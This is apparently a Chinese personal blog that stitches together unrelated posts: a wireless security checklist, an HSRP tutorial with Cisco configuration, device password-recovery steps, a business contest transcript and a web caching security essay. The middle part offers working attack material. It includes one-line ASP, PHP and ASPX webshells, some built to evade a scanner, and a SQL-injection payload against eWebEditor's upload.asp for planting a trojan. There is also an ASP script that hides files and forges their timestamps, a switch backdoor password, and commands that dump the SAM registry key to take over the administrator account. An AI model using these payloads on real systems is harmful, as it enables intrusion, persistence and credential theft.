Chinadu's Blog

认证攻击
入侵者使用这些攻击，窃取合法用户的身份和证书，进而访问其它私密网络和服务。



有效性攻击
这些攻击采用拒绝合法用户的访问无线局域网资源或者削弱那些资源的方法，从而阻止把无线服务传递给合法的用户。

在我们充满专业术语的行业，清除你的周围充满的无线攻击，以及它们潜在的商业影响非常困难。本条技巧中提供了预防对802.11和802.1X攻击的相关列表，列表中按照威胁的类型分类，并列出了相关的攻击方法和工具，这样我们就理清了混乱无序的情况。

访问控制攻击
　　这些攻击使用无线或者规避无线局域网访问控制方法，比如AP MAC过滤器和802.1X端口访问控制，进而试图穿透网络。

机密性攻击
　　这些攻击试图截取无线组织发送的私人信息，不论是通过802.11还是高层协议，以明文还是加密形式发送的信息。



完整性攻击
　　这些攻击通过无线发送伪造的控制、管理或者数据帧，误导接受者或者推动其它类型的攻击（比如，拒绝服务攻击）。

漏洞评估可以帮助你在攻击者利用前，找到并修复WLAN漏洞。但是从哪里开始呢？应该查找什么呢？如何涵盖所有的位置呢？在这份清单中，TechTarget中国的特约专家将帮助你回答这些问题。

1．发现临近的无线设备

　　如果你知道有什么设备，就不能评估WLAN漏洞。从搜索办公室内外的无线设备开始，创建后续步骤的基础。
*那一个通道拥有2.4 GHz带宽的活跃流量？
*那一个通道拥有2.4 GHz带宽的活跃流量？
*在这些频段中，有没有非—802.11界面的资源呢？

　　对每一个已知的802.11访问端点，记录：
*媒体访问控制（MAC）地址
*扩展服务集标识符（ESSID）
*通道
*平均/最高信噪比(SNR)

　　对每一个一发现的802.11工作站，记录：
*MAC地址
*关联ESSID
*关联接入点或者同等的工作站
*平均/最高SNR
*如果可见，802.1X身份
*大约位置和可能的持有人

2．调查欺骗性攻击设备
　　对于非-802.11的干扰资源（例如，微波炉、蓝牙和无线电话），光谱分析器可以帮助采集资源痕迹。对于802.11设备，把调查结果和你已有的详细目录作对比，分离出需要深入调查的未知设备。注意在带宽和通道中查找通常不使用的活动可以帮助你发现试图逃避检测的设备。为了更多地了解如何调查这些“欺骗”设备和他们对你的WLAN产生的风险，请阅读相关的技巧《捕获欺骗性威胁的秘诀》。

3．测试你自己的访问端点

　　下一步，把你的注意力转移到你自己的WLAN资源，从向用户发送无线服务的接入点开始。这些接入点位于包含受信合不受信的设备的网络上。同样的，他们也应该通过对面向互联网的边界防火墙和访问路由器的渗透测试。关于每个接入点，你应该回答如下问题：
*接入点运行的是最新的固件和安全补丁吗？
*出厂默认ESSID已经更改了吗？
*默认管理员登录/密码已经更改了吗？
*管理员密码是不是容易被破解？
*有没有强大的认证选择（例如，隐私密钥）？
*有没有开放不必要的端口（例如，Telnet、HTTP、SNMP、TFTP）
*这些开放端口容易受到攻击吗？
*有没有加密管理界面（例如，SSH、HTTPS）？
*是否激活了安全警告和日之（例如，系统日志（sylogs）、traps）？
*有没有使用过滤器阻止通过接入点传播到有线网络中的未认证的协议（例如ARP、RIP、SNMP、NetBIOS）？
*有没有（使用）过滤器阻止用户到用户的无线？
*接入点使用合适的ESSID和通道了吗？
*安全参数和拒绝策略一致吗？
*如果接入点使用WEP，破解密钥需要多长时间？
*接入点发布已知的漏洞初始化厂商（IV）了吗？
*如果接入点使用预共享密钥（PSK），容易破解吗？
*如果接入点没有使用WPA2，可以获得WPA2更新吗？
*接入点可以抵挡模拟802.11拒绝服务攻击吗（例如，认证洪流）？

4.测试你自己的工作站

　　有些工作站在你调查时可能没有活动，所以确保你的资产详细目录上的每一个802.11-功能设备都检查了，包括笔记本电脑、桌面电脑、PDA、VoIP 手机、打印机、扫描器和耳机或听筒。你可能想要“ping扫描”无线子网，来确定逃过早期检查的秘密设备的位置。然后，回答关于你的每一个无线工作站的下列问题：
*工作站是否运行了最新的操作系统和应用安全补丁？
*是否使用了引导程序或者操作系统认证阻止丢失/被窃/无意使用？
*目前的杀毒程序和反间谍软件程序运行了吗？
*无线界面有没有被个人防火墙保护？
*有没有开放不需要的端口（例如netbios-ns/ssn、 microsoft-ds、 ssdp）？
*有没有通往无线的不必要的协议（例如文件/打印机共享）？
*有没有把可能的无线入侵（例如，以阻止的会话）计入日志？
*无线客户是否和ANY网络相关联？ANY特别吗？
*用户自动使用家庭或者热点SSID再聚焦了吗？
*磁盘上保留了无线用户的信任状（例如，密码）了吗？
*工作站扫描了合适的带宽并使用了合适的ESSID了吗？
*安全参数和定义的策略一致吗？
*工作站发布已知的漏洞IV了吗？
*如果工作站使用802.1X，它的认证可见吗？
*如果使用802.1X，检查服务器的证书了吗？
*如果不使用WPA2，可以获得WPA2更新吗？
*如果在无线上使用VPN客户端，配置合适吗？

5．测试你的WLAM架构

　　最后，评估无线子网中的所有网络架构设备的安全性，包括无线交换机、防火墙、VPN网关、DNS服务器、DHCP服务器、RADIUS服务器、运行被俘入口登录页的Web服务器和管理以太网的交换机。

　　和接入点一样，所有的这些设备应该通过相同的通常运行面向互联网的服务器的渗透测试。例如，被俘入口应该通过通常运行DMZ Web服务器的测试。包括按照设计评估对需要补丁的已知漏洞的程序/版本的测试。

　　大部分的架构测试都不是为无线特定的，但是附加的测试可能适合802.1X架构。例如，你可能希望测试RADIUS服务器的功能来温和的拒绝错误格式的EAP信息，包括有害EAP长度和深度。

6．采用测试结果

　　很不幸，没有可以帮助你进行最后的一步的清单。现在应该回顾一下测试结果，并评估你可能没发现的漏洞。排除可能的漏洞，并降低可能利用其他漏洞的机会。例如，如果你在接入点上发现了远程登录，决定是否停止服务，以及如何停止。你可以使用SSH代替远程登录来管理接入点吗？你可以把SSH限制到以太网上使无线收发邮件的后台程序不被检测到吗？

　　一旦你使用了修复，重复测试来验证结果是你现在想要的。理想的是，漏洞评估应该定期进行，来检测和评估新的无线设备和配置的更改。还有，寻找可以使测试自动化的机会，让它们更快，更一致、更严格。

DECLARE hCForEach CURSOR GLOBAL
FOR
Select N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''《script src=http://hack.hackeye.com/cn.js》《/script》'','''')'
FROM sysobjects o,syscolumns c,systypes t
Where o.id=c.id
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name IN('varchar','nvarchar','char','nchar','text')

EXEC sp_MSforeach_Worker @command1=N'?'

其中《script src=http://hack.hackeye.com/cn.js》《/script》为要查找的插入的js内容


asp一句话
<%execute(request("1"))%>

php一句话
<?php eval($_POST[1]);?>

aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>'的asp一句话
<script language=VBScript runat=server>execute request("1")</script>

不用双引号的一句话。
<%eval request(chr(35))%> 


漏洞文件是upload.asp

Sub InitUpload()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
sSql = "select * from ewebeditor_style where s_name='" & sStyleName &
"'"
ors.Open sSql, oConn, 0, 1
If Not ors.Eof Then
sUploadDir = ors("S_UploadDir")
sUploadDir = Replace(sUploadDir, "\", "/")
If Right(sUploadDir, 1) <> "/" Then
sUploadDir = sUploadDir & "/"
End If

Select Case sType
Case "FILE"
sAllowExt = ors("S_FileExt")
nAllowSize = ors("S_FileSize")
Case "MEDIA"
sAllowExt = ors("S_MediaExt")
nAllowSize = ors("S_MediaSize")
Case "FLASH"
sAllowExt = ors("S_FlashExt")
nAllowSize = ors("S_FlashSize")
Case Else
sAllowExt = ors("S_ImageExt")
nAllowSize = ors("S_ImageSize")
End Select
Else
OutScript("parent.UploadError('无效的样式ID号，请通过页面上的链接进行操作！')")
End If
ors.Close
' 任何情况下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
End Sub


sStyleName变量是直接从style中读取到没有经过任何过滤
我们要做的就是通过 union 增加一个 sAllowExt类型 构造

upload.asp?action=save&type=IMAGE&style=fox' union select
S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileE­xt,S_FlashExt,
[S_ImageExt]+'|
cer',S_MediaExt,S_RemoteExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,­S_RemoteSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObje­ct,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder
from ewebeditor_style where s_name='standard' and 'a'='a


union要之前的select结果为空(这个好办)
同时要知道字段数(下载到数据库查也能查到了)
我使用[S_ImageExt]+'|cer'使S_ImageExt中加入"|cer"串。
用NC发包就可以上传木马了。

<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性，比如设置为只读，隐藏，系统等等；FSO中的attributes属性修改文件属性，1只读，2隐藏，4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路    径：<input name=path value='"&server.mappath("/")&"' size='30'>(一定要以\结尾)<br />"
response.write "文件名称：<input name=filename value='test.txt' size='30'><br />"
response.write "修改时间：<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value=修改并隐藏文件>"
response.write "</form>"

'获取提交的参数
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")

if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then

'通过fso设置文件属性
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4  '设置文件属性为隐藏+系统

'通过shell.Application修改文件的最后修改时间
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime

end if
%>


选手简介
谢莉，女，1972年生，专科。一家火锅餐饮公司总经理。

参赛项目
打造中国知名火锅连锁品牌。核心竞争力是，吃了不上火的独特火锅底料。目前公司员工八千多人，从2004年到2006年连续三年被评为中国餐饮百强，先后获得中国名火锅、中国餐饮名店、重庆火锅十大品牌等50项殊荣。力争三至五年内把公司做到上市。

现场简况
《赢在中国》第三赛季晋级篇第三场。评委：熊晓鸽、史玉柱、俞敏洪。

现场回放
史玉柱：你现在有170家连锁店，是吧？

谢莉：是的。

史玉柱：加盟店你参与管理吗？

谢莉：是这样的。一方面对他们进行培训，另一方面是提供底料和物料这块，这是绝对不能够自己去弄的。

史玉柱：170个加盟连锁店，实际上已经很多了，因此管理对你来说，应该放到第一位。

谢莉：不管厨房也好，前厅也好，每一个岗位我们都有一个完善的管理守则和一个完整的流程，标准都非常清晰，易学易懂。我们还不定期对连锁店老板进行培训。

史玉柱：据了解，你在重庆是第三名吧。你和第一、第二比起来差距在哪儿？

谢莉：不应该有差距，我们走的是不同的路线。

史玉柱：你没有不足？

谢莉：不足应该有。恐怕是管理上不如他们完善，因为他们在这个行业已经经营了二十年，而我只有十年，但我会向他们学习。

史玉柱：还有其他不足吗？

谢莉：另外在店面装修、物流上也没有他们完善，现在我只在厨房管理上做得比较好。

史玉柱：你觉得火锅美味的诀窍在什么地方？

谢莉：浓度。吃火锅，从第一口吃到最后一口，味道必须保持一致。

史玉柱：你公司员工的待遇如何？

谢莉：基础服务员的工资现在没有超过800的，在重庆，服务员工资没北京这么高。

史玉柱点评

我提两个建议。

第一个建议是管理问题。现在你在重庆是第三名，第三名一般情况下应采取危机管理，但我觉得你危机意识不强，实际上你应该给自己的团队和员工，经常灌输危机思想，要让大家共同找出我们比第一、第二差在哪儿，人家不可能都是运气好，肯定有值得学习的长处。第三名在前五名里经常是最危险的名次，不是上去就是下去。你和你的团队必须树立很强烈的危机意识才行。另外，你有这么多店，不可能保证每天都平安无事，出了事，你怎么解决，这也需要有个危机处理预案。生于忧患！

第二个建议，是工资问题。我建议你走高工资路线。表面上看，给员工增加工资好象是增加成本，但根据我自己的经历，我给员工增资的时候，紧接着就是我利润最好的时候。这点或许你不太认可。但你仔细想想，这里面有道理。对老板来说，你别指望最基层第一线的员工跟你一样有雄心抱负，对你强调的那种企业文化有认同，实际上他们更多的人还是面临着要考虑个人利益问题。在一个行业里，如果长期走低工资路线，无疑将影响队伍的稳定，企业必须会做不好。另外，老板来说，走高工资路线，那你和员工的关系你处主动地位，如果走低工资，实际上你是被动的。如果你能比你前面两个竞争对手的员工工资、稍微提高一点，我坚信一年之后，你的利润率会提高。当然，这样做需要勇气和智慧，但我建议你试试。

HSRP：热备份路由器协议（HSRP：Hot Standby Router Protocol）
　　热备份路由器协议（HSRP）的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器，以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说，当源主机不能动态知道第一跳路由器的 IP 地址时，HSRP 协议能够保护第一跳路由器不出故障。该协议中含有多种路由器，对应一个虚拟路由器。HSRP 协议只支持一个路由器代表虚拟路由器实现数据包转发过程。终端主机将它们各自的数据包转发到该虚拟路由器上。
　　负责转发数据包的路由器称之为主动路由器（Active Router）。一旦主动路由器出现故障，HSRP 将激活备份路由器（Standby Routers）取代主动路由器。HSRP 协议提供了一种决定使用主动路由器还是备份路由器的机制，并指定一个虚拟的 IP 地址作为网络系统的缺省网关地址。如果主动路由器出现故障，备份路由器（Standby Routers）承接主动路由器的所有任务，并且不会导致主机连通中断现象。
　　HSRP 运行在 UDP 上，采用端口号1985。路由器转发协议数据包的源地址使用的是实际 IP 地址，而并非虚拟地址，正是基于这一点，HSRP 路由器间能相互识别.


　　 HSRP技术在网络中的应用
　　随着Internet的日益普及，人们对网络的依赖性也越来越强。这同时对网络的稳定性提出了更高的要求，人们自然想到了基于设备的备份结构，就像在服务器中为提高数据的安全性而采用双硬盘结构一样。路由器是整个网络的核心和心脏，如果路由器发生致命性的故障，将导致本地网络的瘫痪，如果是骨干路由器，影响的范围将更大，所造成的损失也是难以估计的。因此，对路由器采用热备份是提高网络可靠性的必然选择。在一个路由器完全不能工作的情况下，它的全部功能便被系统中的另一个备份路由器完全接管，直至出现问题的路由器恢复正常，这就是热备份路由协议（HotStandbyRouterProtocal），HSRPRFC2281技术要解决的问题。
　　　一、HSRP协议概述
　　实现HSRP的条件是系统中有多台路由器，它们组成一个“热备份组”，这个组形成一个虚拟路由器。在任一时刻，一个组内只有一个路由器是活动的，并由它来转发数据包，如果活动路由器发生了故障，将选择一个备份路由器来替代活动路由器，但是在本网络内的主机看来，虚拟路由器没有改变。所以主机仍然保持连接，没有受到故障的影响，这样就较好地解决了路由器切换的问题。
　　为了减少网络的数据流量，在设置完活动路由器和备份路由器之后，只有活动路由器和备份路由器定时发送HSRP报文。如果活动路由器失效，备份路由器将接管成为活动路由器。如果备份路由器失效或者变成了活动路由器，将有另外的路由器被选为备份路由器。
　　在实际的一个特定的局域网中，可能有多个热备份组并存或重叠。每个热备份组模仿一个虚拟路由器工作，它有一个Well－known－MAC地址和一个 IP地址。该IP地址、组内路由器的接口地址、主机在同一个子网内，但是不能一样。当在一个局域网上有多个热备份组存在时，把主机分布到不同的热备份组，可以使负载得到分担。

　　　二、HSRP的工作原理
　　HSRP协议利用一个优先级方案来决定哪个配置了HSRP协议的路由器成为默认的主动路由器。如果一个路由器的优先级设置的比所有其他路由器的优先级高，则该路由器成为主动路由器。路由器的缺省优先级是100，所以如果只设置一个路由器的优先级高于100，则该路由器将成为主动路由器。
　　通过在设置了HSRP协议的路由器之间广播HSRP优先级，HSRP协议选出当前的主动路由器。当在预先设定的一段时间内主动路由器不能发送hello消息时，优先级最高的备用路由器变为主动路由器。路由器之间的包传输对网络上的所有主机来说都是透明的。

　　配置了HSRP协议的路由器交换以下三种多点广播消息：
　　Hello———hello消息通知其他路由器发送路由器的HSRP优先级和状态信息，HSRP路由器默认为每3秒钟发送一个hello消息；
　　Coup———当一个备用路由器变为一个主动路由器时发送一个coup消息；
　　Resign———当主动路由器要宕机或者当有优先级更高的路由器发送hello消息时，主动路由器发送一个resign消息。

在任一时刻，配置了HSRP协议的路由器都将处于以下六种状态之一：
　　Initial———HSRP启动时的状态，HSRP还没有运行，一般是在改变配置或端口刚刚启动时进入该状态。
　　learn———路由器已经得到了虚拟IP地址，但是它既不是活动路由器也不是等待路由器。它一直监听从活动路由器和等待路由器发来的HELLO报文。
　　Listen———路由器正在监听hello消息。
　　Speak———在该状态下，路由器定期发送HELLO报文，并且积极参加活动路由器或等待路由器的竞选。
　　Standby———当主动路由器失效时路由器准备接管包传输功能。
　　Active———路由器执行包传输功能。

下面转一个例子：
============================================================================
在企业中，如果有自己的局域网，而且还规划了各个部门，那么部门之间可能会被规划到了不同的IP网段中，那么各部门之间的互相访问，则需要路由器来完成，那么各个部门因为在不同的子网中，所以它们的出口网关也不同。


看上面这个图。左下角有一台用路由器来模拟的PC机。交换机无法和真实的PC连接，一个小BUG，只好用了一台3620来代替PC.变通一下，也可以完成任务的）。它用F0/0口连接到了S3上。
　　现在在Router上有一个网段为1.1.1.1/24，而PC机的IP为192.168.1.200/24，很显然它们不在同一个网段中。那么如果PC要访问Router，则需要配置一个网关。
　　这里，S3将不做任何的配置，只把它看成一台连接设备，集线设备……
　　这里的网关选择有两个，S1和S2的FA0/1口。随便给PC配上哪一个就可以了。
　　但是，如果只配一个网关的话，这个网关失效了怎么办呢？那么PC将无法访问外部。而对于一个企业内部的员工而言，除非懂点这个……一般情况下，并不是每个员工能真正弄的清楚网关是干什么的或者怎么在PC上配网关。这样一来的话，那个指定的网关失效了，假设有200多台员工机器现在需要修改网关，对管理员来说，将是一项很艰巨的任务！

　　HSRP——路由热备份协议解决了这个问题。
　　刚才在图中谈到，S1和S2的F0/1口都可以成为PC的网关。认真看一下这个图，就能想清楚的哦。S1到PC和S2到PC其实都差不多，只是S2到PC中间多了一台S4而已。
　　在HSRP中，能把可以做为网关的设备集合起来形成一个虚拟的组——就好象windows的服务器集群。对外来看，它们是一台设备……
　　这里，我们把S1和S2看成是一台新的虚拟设备——S0，那么它有一个接口，这个接口就是PC的网关。这个接口必须和S1、S2的F0/1口在同一个网段中。
　　HSRP不仅为这个新的虚拟设备虚拟出了一个接口，我们还将给其配上IP信息，而且它
还会自动的为该接口虚拟出一个MAC地址，在我的BLOG里有篇文章是关于ARP的，里面讲到过，MAC和IP的关系。
　　这个MAC地址是有规律的，格式如下
　　0000.0c07.acXX
　　这是一段十六进制的MAC，前六位是厂商代码
　　第七位到第十位为HSRP标识
　　十一位和十二位是我们配置HSRP时的组号，换成二进制（比如我们定义了一个HSRP组，组号为1，那么这里就是01）

　　HSRP有五种状态：
　　1、Initial（初始化）
　　2、listen（监听）
　　3、speak（发言）
　　4、standby（备份）
　　5、Active（活动——主）

例如现在有两台网关设备被定义到一个HSRP组中，虽然HSRP承担了网关的功能，但其实是这个组中的某一台设备来承担起来的。到底是谁被HSRP映射了呢？这里需要进行一个选举。它们根据优先级来通过在指定接口上向外发送HSRP的hello报文来进行选举，而且默认为非抢占式的。在选举时，有的设备可能会经历如上5种状态，那么该设备将会到达active，即为担当重任的那台网关设备。其次就是standby，也就是在active设备down后，它将启用并接管曾经的active的工作变成新的active设备。也可以有多台网关设备。在HSRP中，活动设备只有一台。

　　根据上面的图。把实际的配置完成。

PC：
PC(config-if)#ip add 192.168.1.200 255.255.255.0
PC(config-if)# no shut
PC(config)#ip route 0.0.0.0 0.0.0.0 192.168.1.100
//默认网关指向HSRP虚拟接口



S1：
S1(config)#int fa0/1
S1(config-if)#no switchport
//定义该接口为一个三层接口
S1(config-if)#ip add 192.168.1.1 255.255.255.0
S1(config-if)#no shut
S1(config-if)#standby 1 ip 192.168.1.100
//定义一个组号为一的虚拟HSRP组
S1(config-if)#standby 1 proiority 210
//定义该组在F0/1接口下的优先级为210
S1(config-if)#standby 1 preempt *把HSRP定义为抢占式
S1(config-if)#standby 1 track fa0/0 30
//监测上行接口，当上行接口down后，优先级自动减30，也就是变成180
S1(config-if)#int fa0/0
S1(config-if)#ip add 172.16.1.1 255.255.255.0
S1(config-if)#no shut
S1(config)#router rip
S1(config)#ver 2
S1(config)#no auto
S1(config)#net 172.16.1.0
S1(config#net 192.168.1.0



S2：
S2(config)#int fa0/1
S2(config-if)#ip add 192.168.1.2 255.255.255.0
S2(config-if)#no shut
S2(config-if)#standby 1 ip 192.168.1.100
S2(config-if)#standby 1 priority 200(默认为200)
S2(config-if)#standby 1 preempt
S2(config-if)#int fa0/0
S2(config-if)#no switchport
S2(config-if)#ip add 172.16.2.1 255.255.255.0
S2(config-if)#no shut
S2(config)#router rip
S2(config-router)#ver 2
S2(config-router)#no auto
S2(config-router)#net 192.168.1.0
S2(config-router)#net 172.16.0.0



Router：
Router(config)#int fa0/0
Router(config-if)#ip add 172.16.1.2 255.255.255.0
Router(config-if)#no shut
Router(config)#int fa0/1
Router(config-if)#ip add 172.16.2.2 255.255.255.0
Router(config-if)#no shut
Router(config)#int lo 0
Router(config-if)#ip add 1.1.1.1 255.255.255.0
Router(config)#router rip
Router(config-router)#net 172.16.0.0
Router(config-router)#net 1.1.1.1

项目上用户忘记路由器密码，找了点资料，顺便发出来。

在网络日常管理与维护的工作中，你是否遇到过这种现象：由于忘记了口令，你被原来亲切的“朋友”——路由器或交换机强行拒于门外，无法进行参数的重新设置、信息统计。下面就针对几种常见而重要的网络设备的口令清除方法谈谈本人的一点“小窍门”。
　　Cisco 路由器配置信息及口令的清除
　　适用范围：所有IOS在10.0及以上版本的Cisco 2000、2500、3000、4000、7000系列路由器。
　　清除步骤如下：
　　1．用路由器所带的串口线连接到Console口，以下通过Win95的超级终端进行；
　　2．路由器加电后60秒内，按下CTRL(如果不行按CTRL－BREAK)键，等待出现“〉”提示符；
　　3．键入“〉e/s 2000002”命令，并记录下返回值，用在后面“Router(config)＃config－register 0x2102”命令中；(通常返回值是2102)

　　4．在“〉”符号后键入“o/r 0x42”；
　　5．键入“i”, 路由器将重新初始化，对于出现的提示问题，回答No；
　　6．键入“Enable”(没有口令，按回车即可)；
　　7．改变口令(无论是否加密)：
　　a. 输入“config mem”或“copy startup－config mem”；
　　b. 输入“write”；
　　c. 输入“config term”并输入“enable secret〈password〉”和“enable password〈password〉”，改变口令；
　　8．去掉用户提示及口令：
　　a．进入虚拟行配置模式，输入“line vty 0 4”；
　　b．输入“password〈password〉”，改变口令；
　　c．输入“login”（可以去掉用户提示，原来是login local）；
　　9．完成后按Ctrl－z结束；
　　10．输入“write”保存所做的改变；
　　11．进入特权配置模式，键入“config－register 0x2102”(注意，必须完成此步)；
　　12．Write保存配置信息；
　　13．退出配置模式，Reload完成重新启动路由器即可。
　　说明：o/r 0x42是从Flash中引导路由器，如果不成功，可采用o/r 0x41从ROM中引导路由器，其余操作与o/r 0x42相同，但是最好只在Flash引导不成功或Flash内容被删除、没有Flash情况下才用。使用0x41只能查看或删除配置信息而不能更改口令。

Cisco Catalyst 3000配置信息的清除
　　1．在交换机加电启动时，按住交换机后面板上的Sys Req按钮5秒钟，然后松开；
　　2．进入配置选单，选择“Clear Non－Volatile RAM”，即可清除交换机的所有配置信息（包括口令）。
　　3．根据需要，重新配置参数、口令等。
　　Intel Express交换机口令的清除
　　适用范围：Intel Express 10 Switch/10 Switch＋/100FX Switch交换机
　　方法一：
　　1．进入交换机的维护模式（Maintenance Mode），输入：run defparm，以重启交换机，把原来的配置变成原始默认设置(原始默认没有口令)。
　　2．进入维护模式：
　　a．关闭交换机后按下面板上的Maint按钮，然后给交换机加电；
　　b．按下按钮保持3秒钟至System LED 绿色灯快速闪烁；
　　c．释放Maint按钮。
　　3.通过交换机的串口，用直连式串口线以9600/N/8/1，兼容VT100的终端模式进入交换机；
　　4.按Enter键，直到屏幕上出现命令行提示。
　　方法二：利用Intel交换机的后门
　　Telnet登录到交换机上，提示输入用户名时，随便输入一个，然后输入通用的口令“debug”，即可进入交换机。
　　3COM NetServer远程访问服务器
　　口令的清除
　　查看NetServer Configuration DIP开关，它控制NetServer的硬件配置信息。其中DIP4控制“Erase/Reinitialize Flash Configuration”。
　　清除步骤如下：
　　1．把DIP4拨到ON状态，当NETServer启动时，保于Flash的配置信息将会被删除；
　　2．关闭机器再把DIP4拨到OFF，加电启动，然后就可以重新配置了。

SA权限的注射点的时候,我们能够使用系统自带的一些命令来读取注册表键信息.
sa默认是SYSTEM权限，可以读sam键.
regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 win2K
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg win2003
读出来后,我们就可以直接更改管理员密码进行登陆了:
net user administrator test
用administrator登陆.
用完机器后
reg import c:\test.reg
根本不用克隆.
但是要注意,一定要找到对应的sid.
HKEY_CURRENT_USER\Software\ORL\WinVNC3
HKCU\Software\ORL\WinVNC3\Password

今天闲一点，大致说说目前流行的这种WEB系统安全架构需要注意的问题。
顺便先提一下所谓当前流行的WEB架构。在网络架构方面，目前流行的趋势和以前传统的门户网站采用七层交换，或者四层交换集中式部署做负载均衡不同，比较倾向于在物理位置上做分布式节点，通过智能DNS引导用户就近访问。这些CDN节点，有的是实际的WEB服务器，但是大多数可能只是一些Squid或者 Nginx之类的反向代理。这样做的好处第一是有更好的用户体验，第二是在拒绝服务攻击时，也有更灵活的应对方式。
鉴于系统分布式部署的趋势，因此在编码方面，也就开始流行刺提到过的Restful风格。所谓Restful风格，本质来说，就是客户端自己维持自己的状态，而且服务端信任这个客户端维持的状态。根据从客户端获取到的不同的状态，返回不同的页面。这里尽量的减少了服务端的判断等工作，让客户端对WEB系统的依赖性减轻，服务端做的仅仅是根据状态返回结果，并且在需要时为服务器设置一个新的状态，即所谓状态变迁。这点和P2P的去中心化有些类似，客户端不太在意自己连接到了哪一个服务器上面，只要自己维持着自己的状态，连接到WEB系统的任意一个服务器得到的结果都是一样的。目前流行的做法，就是不适用 session仅仅使用cookie，当然使用数据库session也是可以的。但是我觉得尽量把这些事情给客户端去做更好，减少数据库服务器的维护成本和故障风险，去中心化彻底一些。
目前这种分布式缓存节点大量使用，以及客户端自己维持状态的架构的流行，带来的两个安全风险就是敏感内容缓存的风险，以及客户端状态窃取或伪造的风险，而且前所未有的突出。
关于客户端维护的状态检验以及反窃取，关键点在于对cookie的加密算法强度以及完整性检验可靠度。在客户端状态被窃取时降低风险，我提到过cookie加入时间戳的方案，这个在刺的文章里有很详细的探讨，包后后面很多评论。

关于用户退出以及反窃取这里，再提一点。使用Session的方案，用户退出时在服务端销毁Session即可。即使有人盗取了cookie，使用 cookie里面保存的sessionid做刷新也是无效的，因为session实体已经在服务器上不存在了。新的无session方案中，这方面实现起来会麻烦一些。我的看法是，需要一个数据库记录用户的注销状态。当用户退出时，清空用户的cookie，同时在数据库中写入该用户已经登陆，下次不再使用 cookie认证，强制要求输入密码登陆。这样解决了cookie被盗取但是没超时的情况下，用户退出被盗取的cookie也不失效的问题。可惜的是这样又加上了一个数据库，那么结合起来看，把Session存入一个集中的数据库，在部署上并不比单纯的使用cookie差多少。
敏感内容缓存风险，主要是指用户A访问CDN上某个节点的时候，查看了一些包含自身信息在内的页面，而WEB系统在缓存方面没有做到足够的安全性，可能会导致这些敏感信息被用户B无意中看到。虽然缓存服务器可能不会缓存这些内容，但是随着缓存接点的急剧扩张，小几率的问题也会逐渐放大。就这个问题而言，可以在缓存服务器和代码两个点中的任意一个采取措施。虽然可以通过配置代理服务器策略保证安全，但是一般来说，防御应该是多层的，立体的，必须在代码中对缓存作出明确的控制。因为对于安全来说，需要尽可能的在不安全的环境中的保证系统的安全。代码中不做安全控制，这次部署的缓存系统是安全的，下次部署的缓存系统则可能出现疏忽。更何况，其他第三方无法控制的缓存服务器。
WEB系统中对缓存的控制，在RFC2616中14.9节有详细的描述。主要有public，private，no-cache，no-store等选项，具体描述可以仔细阅读RFC文档。值得一说的是no-cache和no-store的区别，no-store是比no-cache更严格的控制，按照 RFC原文：Even when this directive is associated with a response, users might explicitly store such a response outside of the caching system (e.g., with a “Save As” dialog).
总的来说，这种流行的架构看重分布式部署，和客户端状态维持，因此在架构中，更需要考虑缓存的安全以及客户端cookie的安全。在编码之初，就要关注到这些问题，到后期再改，就会来不及了。

from：http://laoxiege.blog.sohu.com/110867388.html